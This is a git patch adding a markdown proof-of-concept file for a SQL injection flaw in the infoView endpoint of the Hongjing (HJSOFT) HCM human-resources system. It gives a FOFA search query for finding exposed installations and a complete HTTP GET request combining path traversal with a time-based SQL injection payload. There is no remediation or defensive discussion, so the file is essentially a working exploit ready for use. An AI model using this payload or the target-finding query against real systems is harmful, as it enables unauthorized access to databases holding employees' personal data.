From 543202f0e40f5fbbb169fba97d72fb390e38298a Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Tue, 23 Apr 2024 18:41:57 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E5=AE=8F=E6=99=AFHCM=E7=B3=BB?= =?UTF-8?q?=E7=BB=9FinfoView=E5=A4=84=E5=AD=98=E5=9C=A8sql=E6=B3=A8?= =?UTF-8?q?=E5=85=A5=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 宏景HCM系统infoView处存在sql注入漏洞.md | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 宏景HCM系统infoView处存在sql注入漏洞.md diff --git a/宏景HCM系统infoView处存在sql注入漏洞.md b/宏景HCM系统infoView处存在sql注入漏洞.md new file mode 100644 index 0000000..9478be3 --- /dev/null +++ b/宏景HCM系统infoView处存在sql注入漏洞.md @@ -0,0 +1,25 @@ +## 宏景HCM系统infoView处存在sql注入漏洞 + +## fofa +``` +app="HJSOFT-HCM" +``` + + +## poc +``` +GET /templates/attestation/../../general/info/view?kind=1&a0100=1';waitfor+delay+'0:0:3'+-- HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Sec-Fetch-User: ?1 +``` + +![735e80af6f18b931778ed42001b7733e](https://github.com/wy876/POC/assets/139549762/6d8159a2-5884-4a1e-823a-e06705afb37e)